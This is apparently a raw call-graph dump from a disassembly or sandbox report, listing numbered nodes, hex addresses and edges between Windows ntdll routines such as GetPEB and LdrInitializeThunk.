_vswprintf_s 12 API calls 18538->18543 18539->18540 18545 6e23d34 18539->18545 18544 6e1e7f6 18540->18544 18584 6e1dca4 18540->18584 18543->18540 18544->18531 18546 6e78213 18545->18546 18547 6e23d6c 18545->18547 18550 6e7822b GetPEB 18546->18550 18571 6e24068 18546->18571 18600 6e21b8f 18547->18600 18549 6e23d81 18549->18546 18551 6e23d89 18549->18551 18550->18571 18552 6e21b8f 2 API calls 18551->18552 18553 6e23d9e 18552->18553 18554 6e23da2 GetPEB 18553->18554 18555 6e23dba 18553->18555 18554->18555 18556 6e21b8f 2 API calls 18555->18556 18557 6e23dd2 18556->18557 18558 6e23e91 18557->18558 18563 6e23deb GetPEB 18557->18563 18557->18571 18560 6e21b8f 2 API calls 18558->18560 18559 6e78344 GetPEB 18561 6e2407a 18559->18561 18564 6e23ea9 18560->18564 18562 6e24085 18561->18562 18565 6e78363 GetPEB 18561->18565 18562->18538 18577 6e23dfc _vswprintf_s 18563->18577 18566 6e23f6a 18564->18566 18567 6e23ec2 GetPEB 18564->18567 18564->18571 18565->18562 18568 6e21b8f 2 API calls 18566->18568 18581 6e23ed3 _vswprintf_s 18567->18581 18569 6e23f82 18568->18569 18570 6e23f9b GetPEB 18569->18570 18569->18571 18583 6e23fac _vswprintf_s 18570->18583 18571->18559 18571->18561 18572 6e23e62 GetPEB 18573 6e23e74 18572->18573 18573->18558 18574 6e23e81 GetPEB 18573->18574 18574->18558 18575 6e23f4d 18575->18566 18578 6e23f5a GetPEB 18575->18578 18576 6e23f3b GetPEB 18576->18575 18577->18571 18577->18572 18577->18573 18578->18566 18579 6e78324 GetPEB 18579->18571 18580 6e2404f 18580->18571 18582 6e24058 GetPEB 18580->18582 18581->18571 18581->18575 18581->18576 18582->18571 18583->18571 18583->18579 18583->18580 18586 6e1dcfd 18584->18586 18598 6e1dd6f _vswprintf_s 18584->18598 18585 6e1dd47 18615 6e1dbb1 18585->18615 18586->18585 18594 6e1dfc2 18586->18594 18606 6e1e620 18586->18606 18588 6e74ff2 18588->18588 18590 6e1dfae 18590->18594 18628 6e595d0 LdrInitializeThunk 18590->18628 18595 6e5b640 _vswprintf_s 12 API calls 18594->18595 18597 6e1dfe4 18595->18597 18597->18544 18598->18588 18598->18590 18598->18594 18622 6e1e375 18598->18622 18627 6e595d0 LdrInitializeThunk 18598->18627 18604 6e21ba9 _vswprintf_s 18600->18604 18605 6e21c05 18600->18605 18601 6e7701a GetPEB 18602 6e21c21 18601->18602 18602->18549 18603 6e21bf4 GetPEB 18603->18605 18604->18602 18604->18603 18604->18605 18605->18601 18605->18602 18607 6e75503 18606->18607 18608 6e1e644 18606->18608 18608->18607 18629 6e1f358 18608->18629 18610 6e1e725 18613 6e1e729 GetPEB 18610->18613 18614 6e1e73b 18610->18614 18612 6e1e661 _vswprintf_s 18612->18610 18633 6e595d0 LdrInitializeThunk 18612->18633 18613->18614 18614->18585 18634 6e2766d 18615->18634 18617 6e1dbcf 18617->18598 18618 6e1dbf1 18617->18618 18619 6e1dc05 18618->18619 18620 6e2766d GetPEB 18619->18620 18621 6e1dc22 18620->18621 18621->18598 18626 6e1e3a3 18622->18626 18623 6e5b640 _vswprintf_s 12 API calls 18624 6e1e400 18623->18624 18624->18598 18625 6e75306 18626->18623 18626->18625 18627->18598 18628->18594 18630 6e1f370 18629->18630 18631 6e1f38c 18630->18631 18632 6e1f379 GetPEB 18630->18632 18631->18612 18632->18631 18633->18610 18636 6e27687 18634->18636 18635 6e276d3 18635->18617 18636->18635 18637 6e276c2 GetPEB 18636->18637 18637->18635 18639 6e30074 18638->18639 18640 6e3009d GetPEB 18639->18640 18651 6e300ef 18639->18651 18641 6e7c01b 18640->18641 18644 6e300d0 18640->18644 18643 6e7c024 GetPEB 18641->18643 18641->18644 18642 6e5b640 _vswprintf_s 12 API calls 18645 6e30105 18642->18645 18643->18644 18646 6e7c037 18644->18646 18647 6e300df 18644->18647 18645->18497 18656 6ee8a62 18646->18656 18652 6e49702 18647->18652 18650 6e7c04b 18650->18650 18651->18642 18653 6e49720 18652->18653 18655 6e49784 18653->18655 18663 6ee8214 18653->18663 18655->18651 18657 6e37d50 GetPEB 18656->18657 18658 6ee8a9d 18657->18658 18659 6ee8aa1 GetPEB 18658->18659 18660 6ee8ab1 _vswprintf_s 18658->18660 18659->18660 18661 6e5b640 _vswprintf_s 12 API calls 18660->18661 18662 6ee8ad7 18661->18662 18662->18650 18665 6ee823b 18663->18665 18664 6ee82c0 18664->18655 18665->18664 18667 6e43b7a GetPEB 18665->18667 18671 6e43bb5 _vswprintf_s 18667->18671 18668 6e86298 18669 6e43c1b GetPEB 18670 6e43c35 18669->18670 18670->18664 18671->18668 18671->18669 18671->18671 18673 6e27620 18672->18673 18674 6e2766d GetPEB 18673->18674 18675 6e27632 18674->18675 18675->18504 18677 6e59670 18678 6e5967a _vswprintf_s LdrInitializeThunk 18677->18678 18718 6e3b236 18777 6e3b477 18718->18777 18721 6e3b264 18842 6e399bf 18721->18842 18722 6e3b44e 18776 6e3b2a9 18722->18776 18992 6ebcb4f 18722->18992 18727 6e3b2b2 18727->18722 18728 6e3b305 18727->18728 18729 6e3b284 18727->18729 18930 6e40678 18728->18930 18729->18776 18960 6ecfa2b 18729->18960 18734 6e3b333 18734->18722 18935 6e59660 LdrInitializeThunk 18734->18935 18735 6e3b329 18735->18734 18964 6e59660 LdrInitializeThunk 18735->18964 18738 6e3b366 18739 6e828f2 18738->18739 18936 6e4138b GetPEB 18738->18936 18985 6e4174b 18739->18985 18743 6e3b3a6 18745 6e82814 GetPEB 18743->18745 18748 6e3b3b8 18743->18748 18744 6e3b3a1 18746 6e37d50 GetPEB 18744->18746 18747 6e82824 GetPEB 18745->18747 18746->18743 18749 6e3b3c3 18747->18749 18750 6e82837 18747->18750 18748->18747 18748->18749 18752 6e37d50 GetPEB 18749->18752 18965 6ed138a 18750->18965 18754 6e3b3c8 18752->18754 18756 6e8287a GetPEB 18754->18756 18757 6e3b3da 18754->18757 18755 6e37d50 GetPEB 18760 6e8284b 18755->18760 18758 6e8288a 18756->18758 18757->18758 18759 6e3b3e5 18757->18759 18762 6e37d50 GetPEB 18758->18762 18761 6e37d50 GetPEB 18759->18761 18763 6e8285a 18760->18763 18764 6e8284f GetPEB 18760->18764 18765 6e3b3ea 18761->18765 18766 6e8288f 18762->18766 18973 6ed1582 18763->18973 18764->18763 18768 6e3b3f2 18765->18768 18769 6e828be GetPEB 18765->18769 18770 6e8289e 18766->18770 18771 6e82893 GetPEB 18766->18771 18774 6e3b400 18768->18774 18977 6ecfec0 18768->18977 18769->18768 18772 6ed1582 12 API calls 18770->18772 18771->18770 18772->18765 18775 6ecfa2b 28 API calls 18774->18775 18774->18776 18775->18776 19004 6e3b8e4 18777->19004 18780 6e82957 GetPEB 18783 6e82980 18780->18783 18784 6e82963 GetPEB 18780->18784 18781 6e3b65a 18789 6e3b6f5 18781->18789 18790 6e82ad1 18781->18790 18795 6e3b66c GetPEB 18781->18795 18782 6e5b640 _vswprintf_s 12 API calls 18785 6e3b260 18782->18785 18786 6e1b150 _vswprintf_s 12 API calls 18783->18786 18787 6e1b150 _vswprintf_s 12 API calls 18784->18787 18785->18721 18785->18727 18792 6e8297d 18786->18792 18787->18792 18788 6e3b51f 19018 6e59660 LdrInitializeThunk 18788->19018 18789->18795 18796 6eda80d 28 API calls 18790->18796 18791 6e3b4ba 18791->18781 18791->18788 18803 6e829af 18791->18803 18794 6e1b150 _vswprintf_s 12 API calls 18792->18794 18798 6e82995 18794->18798 18799 6e82add 18795->18799 18800 6e3b680 18795->18800 18796->18799 18797 6e3b535 18801 6e3b543 GetPEB 18797->18801 18820 6e3b6b1 18797->18820 18798->18791 19043 6ed2073 18798->19043 18799->18800 18802 6e82aee GetPEB 18799->18802 18808 6e3b690 GetPEB 18800->18808 18809 6e82b06 GetPEB 18800->18809 18804 6e3b554 18801->18804 18805 6e82a12 18801->18805 18802->18800 19053 6eda80d 18803->19053 18815 6e3b562 18804->18815 18816 6e82a2e GetPEB 18804->18816 18805->18804 18810 6e82a1b GetPEB 18805->18810 18811 6e3b6a6 18808->18811 18812 6e82b4f 18808->18812 18809->18808 18813 6e82b19 18809->18813 18810->18804 18811->18820 18821 6e82b6b 18811->18821 18812->18811 18814 6e82b58 GetPEB 18812->18814 18817 6e37d50 GetPEB 18813->18817 18814->18811 18818 6e3b588 18815->18818 18827 6ecfa2b 28 API calls 18815->18827 18816->18815 18819 6e82a41 18816->18819 18822 6e82b1e 18817->18822 18828 6eda80d 28 API calls 18818->18828 18840 6e3b5b8 18818->18840 18824 6ed138a 14 API calls 18819->18824 18820->18782 18823 6e37d50 GetPEB 18821->18823 18825 6e82b31 18822->18825 18826 6e82b22 GetPEB 18822->18826 18829 6e82b70 18823->18829 18824->18815 18830 6ed1582 12 API calls 18825->18830 18826->18825 18827->18818 18828->18840 18832 6e82b83 18829->18832 18833 6e82b74 GetPEB 18829->18833 18831 6e82b4a 18830->18831 18831->18808 18834 6ed1582 12 API calls 18832->18834 18833->18832 18836 6e82b9c 18834->18836 18835 6e3b5d4 18837 6eda80d 28 API calls 18835->18837 18839 6e3b5f2 18835->18839 18836->18836 18837->18839 18839->18781 19019 6e3b73d 18839->19019 18840->18835 18840->18839 19057 6e3bc04 18840->19057 18844 6e399e5 18842->18844 18900 6e399f5 18842->18900 18843 6e39a6e 18845 6e81466 18843->18845 18846 6e39a7c 18843->18846 18844->18843 18849 6ecfa2b 28 API calls 18844->18849 18844->18900 18850 6e8159c 18845->18850 18858 6e81487 18845->18858 18848 6e8166a 18846->18848 18860 6e39a9d 18846->18860 18847 6e39a3d 18906 6e3a830 18847->18906 18852 6eda80d 28 API calls 18848->18852 18849->18843 18851 6eda80d 28 API calls 18850->18851 18854 6e39b2b 18851->18854 18852->18900 18853 6e814c0 18859 6e3a229 39 API calls 18853->18859 18869 6e814f2 18853->18869 18862 6e3a309 81 API calls 18854->18862 18855 6e39ad7 18867 6e39ae8 18855->18867 19146 6e3a229 18855->19146 18856 6eda80d 28 API calls 18856->18900 18857 6ecfa2b 28 API calls 18857->18900 18858->18853 18866 6e3bc04 28 API calls 18858->18866 18863 6e814da 18859->18863 18860->18855 18864 6e3bc04 28 API calls 18860->18864 18862->18900 18868 6e814de 18863->18868 18863->18869 18864->18855 18865 6e39b27 18865->18854 18865->18867 18866->18853 18872 6e815f9 GetPEB 18867->18872 18867->18900 19193 6e3a309 18868->19193 18869->18854 18873 6e81532 GetPEB 18869->18873 18871 6e3a229 39 API calls 18871->18900 18876 6e81624 18872->18876 18877 6e81606 GetPEB 18872->18877 18878 6e8155d 18873->18878 18879 6e8153f GetPEB 18873->18879 18874 6e818a7 18874->18847 18885 6e818e7 GetPEB 18874->18885 18875 6e3bc04 28 API calls 18875->18900 18881 6e1b150 _vswprintf_s 12 API calls 18876->18881 18880 6e1b150 _vswprintf_s 12 API calls 18877->18880 18884 6e1b150 _vswprintf_s 12 API calls 18878->18884 18882 6e1b150 _vswprintf_s 12 API calls 18879->18882 18886 6e81621 18880->18886 18881->18886 18887 6e8155a 18882->18887 18883 6e3a309 81 API calls 18883->18900 18884->18887 18889 6e81912 18885->18889 18890 6e818f4 GetPEB 18885->18890 18891 6e1b150 _vswprintf_s 12 API calls 18886->18891 18892 6e1b150 _vswprintf_s 12 API calls 18887->18892 18888 6e8179e GetPEB 18893 6e817ab GetPEB 18888->18893 18888->18900 18896 6e1b150 _vswprintf_s 12 API calls 18889->18896 18895 6e1b150 _vswprintf_s 12 API calls 18890->18895 18897 6e81643 GetPEB 18891->18897 18898 6e8157c GetPEB 18892->18898 18899 6e1b150 _vswprintf_s 12 API calls 18893->18899 18894 6e1b150 _vswprintf_s 12 API calls 18894->18900 18901 6e8190f 18895->18901 18896->18901 18897->18900 18898->18854 18899->18900 18900->18847 18900->18856 18900->18857 18900->18871 18900->18874 18900->18875 18900->18883 18900->18888 18900->18894 18902 6e1b150 _vswprintf_s 12 API calls 18900->18902 18903 6e1b150 _vswprintf_s 12 API calls 18901->18903 18904 6e817e8 GetPEB 18902->18904 18905 6e81931 GetPEB 18903->18905 18904->18900 18905->18847 18920 6e3a850 18906->18920 18929 6e3aa53 18906->18929 18907 6e822bb GetPEB 18908 6e822c7 GetPEB 18907->18908 18907->18920 18910 6e1b150 _vswprintf_s 12 API calls 18908->18910 18909 6eda80d 28 API calls 18909->18920 18910->18920 18911 6e82385 18913 6eda80d 28 API calls 18911->18913 18912 6e3ab40 28 API calls 18912->18920 18915 6e3aa3c 18913->18915 18914 6e1b150 12 API calls _vswprintf_s 18914->18920 18918 6e823cb GetPEB 18915->18918 18915->18929 18916 6ed2073 28 API calls 18916->18920 18917 6e82376 18919 6eda80d 28 API calls 18917->18919 18921 6e823f6 18918->18921 18922 6e823d7 GetPEB 18918->18922 18919->18911 18920->18907 18920->18909 18920->18911 18920->18912 18920->18914 18920->18915 18920->18916 18920->18917 18920->18929 18924 6e1b150 _vswprintf_s 12 API calls 18921->18924 18923 6e1b150 _vswprintf_s 12 API calls 18922->18923 18925 6e823f1 18923->18925 18924->18925 18926 6e1b150 _vswprintf_s 12 API calls 18925->18926 18927 6e8240d 18926->18927 18928 6ed2073 28 API calls 18927->18928 18927->18929 18928->18929 18929->18729 18931 6e4069c 18930->18931 18933 6e3b30f 18930->18933 18932 6eda80d 28 API calls 18931->18932 18931->18933 18932->18933 18934 6e59660 LdrInitializeThunk 18933->18934 18934->18735 18935->18738 18946 6e413b9 18936->18946 18937 6e413ea 18938 6e416c7 LdrInitializeThunk 18937->18938 18940 6e4141f 18937->18940 18938->18940 18939 6e40678 28 API calls 18939->18946 18941 6e41482 18940->18941 18944 6eda80d 28 API calls 18940->18944 18943 6e3b73d 32 API calls 18941->18943 18948 6e414a0 18943->18948 18944->18941 18945 6e8555b 18947 6e37d50 GetPEB 18945->18947 18946->18937 18946->18939 18946->18945 19435 6e59660 LdrInitializeThunk 18946->19435 18949 6e85560 18947->18949 18952 6e414c9 18948->18952 18953 6e3a830 32 API calls 18948->18953 18950 6e85574 18949->18950 18951 6e85564 GetPEB 18949->18951 18950->18937 18956 6e8557e GetPEB 18950->18956 18951->18950 18954 6e3b391 18952->18954 18955 6eda80d 28 API calls 18952->18955 18953->18952 18954->18739 18954->18743 18954->18744 18957 6e855ef 18955->18957 18956->18937 18958 6e8558d 18956->18958 18957->18957 18959 6ed138a 14 API calls 18958->18959 18959->18937 18963 6ecfa37 _vswprintf_s 18960->18963 18961 6ecfcda _vswprintf_s 18961->18776 18962 6eda80d 28 API calls 18962->18961 18963->18961 18963->18962 18964->18735 18966 6ed13af _vswprintf_s 18965->18966 18967 6e37d50 GetPEB 18966->18967 18968 6ed13d2 18967->18968 18969 6ed13e6 _vswprintf_s 18968->18969 18970 6ed13d6 GetPEB 18968->18970 18971 6e5b640 _vswprintf_s 12 API calls 18969->18971 18970->18969 18972 6e82846 18971->18972 18972->18755 18974 6ed15bd _vswprintf_s 18973->18974 18975 6e5b640 _vswprintf_s 12 API calls 18974->18975 18978 6ecfee5 _vswprintf_s 18977->18978 18979 6e37d50 GetPEB 18978->18979 18980 6ecff02 18979->18980 18981 6ecff06 GetPEB 18980->18981 18982 6ecff16 _vswprintf_s 18980->18982 18981->18982 18983 6e5b640 _vswprintf_s 12 API calls 18982->18983 18984 6ecff3b 18983->18984 18984->18774 19436 6e596e0 LdrInitializeThunk 18985->19436 18987 6e41765 18988 6e41773 18987->18988 18989 6ec3c60 13 API calls 18987->18989 18988->18722 18990 6e8562b 18989->18990 18990->18988 19437 6e596e0 LdrInitializeThunk 18990->19437 18993 6ebccf7 18992->18993 18997 6ebcb72 18992->18997 18993->18776 18994 6e399bf 93 API calls 18994->18997 18995 6ecfa2b 28 API calls 18995->18997 18996 6eda80d 28 API calls 18996->18997 18997->18994 18997->18995 18997->18996 18998 6e3a229 39 API calls 18997->18998 18999 6e3a830 32 API calls 18997->18999 19000 6e3a309 93 API calls 18997->19000 19001 6e3bc04 28 API calls 18997->19001 19002 6ebccc4 18997->19002 18998->18997 18999->18997 19000->18997 19001->18997 19002->18993 19003 6ecfa2b 28 API calls 19002->19003 19003->18993 19005 6e82c43 19004->19005 19017 6e3b8fa 19004->19017 19006 6e82c56 GetPEB 19005->19006 19005->19017 19008 6e82c7f 19006->19008 19009 6e82c62 GetPEB 19006->19009 19007 6e3b49a 19007->18780 19007->18791 19007->18820 19011 6e1b150 _vswprintf_s 12 API calls 19008->19011 19010 6e1b150 _vswprintf_s 12 API calls 19009->19010 19012 6e82c7c 19010->19012 19011->19012 19014 6e1b150 _vswprintf_s 12 API calls 19012->19014 19015 6e82c94 19014->19015 19016 6ed2073 28 API calls 19015->19016 19015->19017 19016->19017 19017->19007 19062 6e3ab40 19017->19062 19018->18797 19020 6e3b855 19019->19020 19021 6e3b77c 19019->19021 19020->19021 19022 6eda80d 28 API calls 19020->19022 19023 6e82bbf GetPEB 19021->19023 19026 6e3b78e 19021->19026 19022->19021 19024 6e82be8 19023->19024 19025 6e82bcb GetPEB 19023->19025 19028 6e1b150 _vswprintf_s 12 API calls 19024->19028 19027 6e1b150 _vswprintf_s 12 API calls 19025->19027 19030 6e3b8e4 30 API calls 19026->19030 19038 6e3b7e2 19026->19038 19029 6e82be5 19027->19029 19028->19029 19031 6e1b150 _vswprintf_s 12 API calls 19029->19031 19033 6e3b7bf 19030->19033 19032 6e82bfd 19031->19032 19032->19026 19035 6ed2073 28 API calls 19032->19035 19034 6e82c18 19033->19034 19041 6e3b7ca 19033->19041 19036 6eda80d 28 API calls 19034->19036 19035->19026 19036->19038 19037 6eda80d 28 API calls 19040 6e82c3e 19037->19040 19038->19037 19039 6e3b800 19038->19039 19039->18781 19040->19040 19041->19038 19070 6e3e4a0 19041->19070 19074 6ecfd22 19043->19074 19045 6ed207d 19046 6ed2085 19045->19046 19047 6ed20a4 19045->19047 19077 6ec8df1 19046->19077 19049 6ed20be 19047->19049 19085 6ed1c06 GetPEB 19047->19085 19049->18791 19054 6eda81c 19053->19054 19055 6eda84e 19053->19055 19142 6ecff41 19054->19142 19055->18820 19058 6e3bc24 19057->19058 19059 6eda80d 28 API calls 19058->19059 19061 6e3bc5f 19058->19061 19060 6e82d06 19059->19060 19061->18835 19063 6e3ab6e 19062->19063 19068 6e3abbb 19062->19068 19064 6eda80d 28 API calls 19063->19064 19066 6e3abd0 19063->19066 19063->19068 19064->19066 19065 6e3ac01 19065->19068 19069 6eda80d 28 API calls 19065->19069 19066->19065 19067 6eda80d 28 API calls 19066->19067 19067->19065 19068->19007 19069->19065 19071 6e3e4c0 19070->19071 19072 6eda80d 28 API calls 19071->19072 19073 6e3e4db 19071->19073 19072->19073 19073->19038 19075 6e59670 _vswprintf_s LdrInitializeThunk 19074->19075 19076 6ecfd3d 19075->19076 19076->19045 19141 6e6d0e8 19077->19141 19079 6ec8dfd GetPEB 19080 6ec8e10 19079->19080 19081 6ea5720 _vswprintf_s 12 API calls 19080->19081 19082 6ec8e2f 19080->19082 19081->19082 19083 6e6d130 _vswprintf_s 12 API calls 19082->19083 19084 6ec8ebd 19083->19084 19084->18791 19086 6ed1c3d 19085->19086 19087 6ed1c20 GetPEB 19085->19087 19089 6e1b150 _vswprintf_s 12 API calls 19086->19089 19088 6e1b150 _vswprintf_s 12 API calls 19087->19088 19090 6ed1c3a 19088->19090 19089->19090 19091 6e1b150 _vswprintf_s 12 API calls 19090->19091 19092 6ed1c5a GetPEB 19091->19092 19094 6ed1d04 19092->19094 19095 6ed1ce7 GetPEB 19092->19095 19097 6e1b150 _vswprintf_s 12 API calls 19094->19097 19096 6e1b150 _vswprintf_s 12 API calls 19095->19096 19098 6ed1d01 19096->19098 19097->19098 19099 6e1b150 _vswprintf_s 12 API calls 19098->19099 19100 6ed1d1c 19099->19100 19101 6ed1d66 19100->19101 19102 6ed1d27 GetPEB 19100->19102 19103 6ed1daf 19101->19103 19104 6ed1d70 GetPEB 19101->19104 19105 6ed1d4f 19102->19105 19106 6ed1d32 GetPEB 19102->19106 19111 6ed1db9 GetPEB 19103->19111 19112 6ed1df8 19103->19112 19109 6ed1d98 19104->19109 19110 6ed1d7b GetPEB 19104->19110 19108 6e1b150 _vswprintf_s 12 API calls 19105->19108 19107 6e1b150 _vswprintf_s 12 API calls 19106->19107 19116 6ed1d4c 19107->19116 19108->19116 19115 6e1b150 _vswprintf_s 12 API calls 19109->19115 19113 6e1b150 _vswprintf_s 12 API calls 19110->19113 19117 6ed1dc4 GetPEB 19111->19117 19118 6ed1de1 19111->19118 19114 6ed1e0a GetPEB 19112->19114 19120 6ed1e52 GetPEB 19112->19120 19124 6ed1d95 19113->19124 19121 6ed1e15 GetPEB 19114->19121 19122 6ed1e32 19114->19122 19115->19124 19123 6e1b150 _vswprintf_s 12 API calls 19116->19123 19125 6e1b150 _vswprintf_s 12 API calls 19117->19125 19119 6e1b150 _vswprintf_s 12 API calls 19118->19119 19128 6ed1dde 19119->19128 19126 6ed1e5d GetPEB 19120->19126 19127 6ed1e7a 19120->19127 19129 6e1b150 _vswprintf_s 12 API calls 19121->19129 19131 6e1b150 _vswprintf_s 12 API calls 19122->19131 19123->19101 19130 6e1b150 _vswprintf_s 12 API calls 19124->19130 19125->19128 19134 6e1b150 _vswprintf_s 12 API calls 19126->19134 19135 6e1b150 _vswprintf_s 12 API calls 19127->19135 19132 6e1b150 _vswprintf_s 12 API calls 19128->19132 19133 6ed1e2f 19129->19133 19130->19103 19131->19133 19132->19112 19137 6e1b150 _vswprintf_s 12 API calls 19133->19137 19136 6ed1e77 19134->19136 19135->19136 19139 6e1b150 _vswprintf_s 12 API calls 19136->19139 19138 6ed1e4f 19137->19138 19138->19120 19140 6ed1e90 GetPEB 19139->19140 19140->19049 19141->19079 19143 6ecff4d _vswprintf_s 19142->19143 19144 6ecffaf _vswprintf_s 19143->19144 19145 6ed2073 28 API calls 19143->19145 19144->19055 19145->19144 19153 6e3a249 19146->19153 19147 6e3a265 19331 6e59660 LdrInitializeThunk 19147->19331 19149 6e3a27e 19150 6e81db5 GetPEB 19149->19150 19152 6e37d50 GetPEB 19149->19152 19155 6e81de4 19150->19155 19156 6e81dc7 GetPEB 19150->19156 19151 6e81c9e 19154 6eda80d 28 API calls 19151->19154 19157 6e3a28d 19152->19157 19153->19147 19153->19151 19158 6e81cb0 19154->19158 19160 6e1b150 _vswprintf_s 12 API calls 19155->19160 19159 6e1b150 _vswprintf_s 12 API calls 19156->19159 19161 6e81cb8 GetPEB 19157->19161 19162 6e3a29a 19157->19162 19158->18865 19163 6e81de1 19159->19163 19160->19163 19164 6e81ccb GetPEB 19161->19164 19162->19164 19165 6e3a2a5 19162->19165 19166 6e1b150 _vswprintf_s 12 API calls 19163->19166 19164->19165 19168 6e81cde 19164->19168 19167 6e37d50 GetPEB 19165->19167 19169 6e81e03 19166->19169 19170 6e3a2ba 19167->19170 19171 6ed138a 14 API calls 19168->19171 19172 6e3a2c2 19170->19172 19173 6e81cf4 GetPEB 19170->19173 19171->19165 19174 6e81d07 GetPEB 19172->19174 19188 6e3a2cd 19172->19188 19173->19174 19175 6e81d1a 19174->19175 19174->19188 19177 6e37d50 GetPEB 19175->19177 19176 6e37d50 GetPEB 19178 6e3a2d2 19176->19178 19179 6e81d1f 19177->19179 19180 6e81d51 GetPEB 19178->19180 19181 6e3a2df 19178->19181 19182 6e81d32 19179->19182 19183 6e81d23 GetPEB 19179->19183 19180->19181 19185 6e37d50 GetPEB 19181->19185 19187 6e3a2ea 19181->19187 19184 6ed1582 12 API calls 19182->19184 19183->19182 19184->19188 19189 6e81d69 19185->19189 19186 6e3a2fb 19186->18865 19187->19150 19187->19186 19188->19176 19190 6e81d7c 19189->19190 19191 6e81d6d GetPEB 19189->19191 19192 6ed1582 12 API calls 19190->19192 19191->19190 19192->19187 19194 6e3a337 19193->19194 19197 6e3a42d 19193->19197 19196 6e399bf 72 API calls 19194->19196 19194->19197 19243 6e3a3c6 19194->19243 19195 6e3a830 32 API calls 19323 6e3a3bd 19195->19323 19198 6e3a37f 19196->19198 19199 6e3a620 19197->19199 19212 6e3a440 19197->19212 19200 6e3a396 19198->19200 19201 6e3a3f8 19198->19201 19202 6e3a62d 19199->19202 19206 6e81e6c GetPEB 19199->19206 19204 6e3a830 32 API calls 19200->19204 19201->19197 19211 6e19373 28 API calls 19201->19211 19210 6e3a65b 19202->19210 19216 6e81eca 19202->19216 19203 6e3a4e5 19209 6e820c2 GetPEB 19203->19209 19264 6e3a4ed 19203->19264 19205 6e3a39e 19204->19205 19205->19323 19332 6e4abd8 19205->19332 19207 6e81e78 GetPEB 19206->19207 19208 6e81e95 19206->19208 19213 6e1b150 _vswprintf_s 12 API calls 19207->19213 19214 6e1b150 _vswprintf_s 12 API calls 19208->19214 19218 6e820d5 GetPEB 19209->19218 19215 6e4174b 13 API calls 19210->19215 19211->19197 19212->19203 19212->19216 19223 6e4174b 13 API calls 19212->19223 19241 6e3a4fb 19212->19241 19212->19243 19217 6e81e92 19213->19217 19214->19217 19220 6e3a66e 19215->19220 19221 6e82240 GetPEB 19216->19221 19216->19243 19224 6e1b150 _vswprintf_s 12 API calls 19217->19224 19222 6e820ea 19218->19222 19218->19241 19225 6e3a676 19220->19225 19226 6e81ede 19220->19226 19228 6e82269 19221->19228 19229 6e8224c GetPEB 19221->19229 19231 6ed14fb 14 API calls 19222->19231 19232 6e3a4d8 19223->19232 19233 6e81eaa 19224->19233 19234 6e37d50 GetPEB 19225->19234 19240 6e3b73d 32 API calls 19226->19240 19226->19243 19227 6e3a594 19230 6e3b73d 32 API calls 19227->19230 19236 6e1b150 _vswprintf_s 12 API calls 19228->19236 19235 6e1b150 _vswprintf_s 12 API calls 19229->19235 19237 6e3a5b2 19230->19237 19231->19241 19232->19226 19238 6e3a4e0 19232->19238 19233->19202 19249 6ed2073 28 API calls 19233->19249 19239 6e3a67b 19234->19239 19245 6e82266 19235->19245 19236->19245 19246 6e3a830 32 API calls 19237->19246 19247 6e37d50 GetPEB 19238->19247 19250 6e81f11 GetPEB 19239->19250 19251 6e3a688 19239->19251 19240->19243 19241->19227 19242 6e3a55f 19241->19242 19248 6e82109 GetPEB 19241->19248 19244 6e82162 19242->19244 19254 6e3a584 19242->19254 19243->19195 19261 6eda80d 28 API calls 19244->19261 19255 6e1b150 _vswprintf_s 12 API calls 19245->19255 19256 6e3a5c1 19246->19256 19247->19203 19257 6e82131 19248->19257 19258 6e82114 GetPEB 19248->19258 19249->19202 19253 6e81f24 GetPEB 19250->19253 19252 6e3a693 19251->19252 19251->19253 19337 6e19373 19252->19337 19253->19252 19260 6e81f37 19253->19260 19259 6e3a830 32 API calls 19254->19259 19262 6e8227e 19255->19262 19263 6e37d50 GetPEB 19256->19263 19266 6e1b150 _vswprintf_s 12 API calls 19257->19266 19265 6e1b150 _vswprintf_s 12 API calls 19258->19265 19259->19227 19358 6ed14fb 19260->19358 19261->19227 19262->19243 19272 6ed2073 28 API calls 19262->19272 19269 6e3a5c6 19263->19269 19264->19218 19264->19241 19270 6e8212e 19265->19270 19266->19270 19273 6e3a5d3 19269->19273 19274 6e821a0 GetPEB 19269->19274 19275 6e1b150 _vswprintf_s 12 API calls 19270->19275 19272->19243 19278 6e821b3 GetPEB 19273->19278 19279 6e3a5de 19273->19279 19274->19278 19276 6e82146 19275->19276 19276->19242 19283 6ed2073 28 API calls 19276->19283 19278->19279 19281 6e821c8 19278->19281 19280 6e37d50 GetPEB 19279->19280 19284 6e3a5e3 19280->19284 19282 6e37d50 GetPEB 19281->19282 19285 6e821cd 19282->19285 19283->19242 19287 6e3a5f0 19284->19287 19288 6e82201 GetPEB 19284->19288 19289 6e821e0 19285->19289 19290 6e821d1 GetPEB 19285->19290 19286 6e3a77d 19291 6e37d50 GetPEB 19286->19291 19298 6e37d50 GetPEB 19287->19298 19287->19323 19288->19287 19294 6ed1411 12 API calls 19289->19294 19290->19289 19293 6e3a787 19291->19293 19295 6e81fea GetPEB 19293->19295 19296 6e3a78f 19293->19296 19294->19279 19300 6e81ffd GetPEB 19295->19300 19296->19300 19327 6e3a79a 19296->19327 19297 6e81f56 GetPEB 19301 6e81f7e 19297->19301 19302 6e81f61 GetPEB 19297->19302 19303 6e82219 19298->19303 19299 6e3a76d 19305 6e3a830 32 API calls 19299->19305 19309 6e82012 19300->19309 19300->19327 19310 6e1b150 _vswprintf_s 12 API calls 19301->19310 19308 6e1b150 _vswprintf_s 12 API calls 19302->19308 19303->19216 19313 6e82075 19303->19313 19304 6e81faf 19306 6eda80d 28 API calls 19304->19306 19305->19286 19306->19286 19307 6e37d50 GetPEB 19312 6e81f7b 19308->19312 19310->19312 19319 6e1b150 _vswprintf_s 12 API calls 19312->19319 19317 6ed1411 12 API calls 19313->19317 19317->19323 19322 6e81f93 19319->19322 19324 6e3a74e 19322->19324 19326 6ed2073 28 API calls 19322->19326 19323->18854 19324->19299 19324->19304 19326->19324 19327->19307 19331->19149 19334 6e4abf1 19332->19334 19333 6e4ac5f 19333->19323 19334->19333 19335 6ecfa2b 28 API calls 19334->19335 19370 6e4ac7b 19334->19370 19335->19334 19338 6e737ee 19337->19338 19339 6e1938f 19337->19339 19340 6eda80d 28 API calls 19338->19340 19339->19338 19341 6e19397 19339->19341 19343 6e193ab 19340->19343 19345 6e193c3 19341->19345 19427 6e193cc 19341->19427 19344 6eda80d 28 API calls 19343->19344 19343->19345 19344->19345 19346 6e19819 19345->19346 19347 6e19829 19346->19347 19356 6e1984c 19346->19356 19348 6e3b8e4 30 API calls 19347->19348 19349 6e1982e 19348->19349 19350 6e19839 19349->19350 19351 6e73bbe 19349->19351 19431 6e1988d 19350->19431 19353 6eda80d 28 API calls 19351->19353 19352 6e1987b 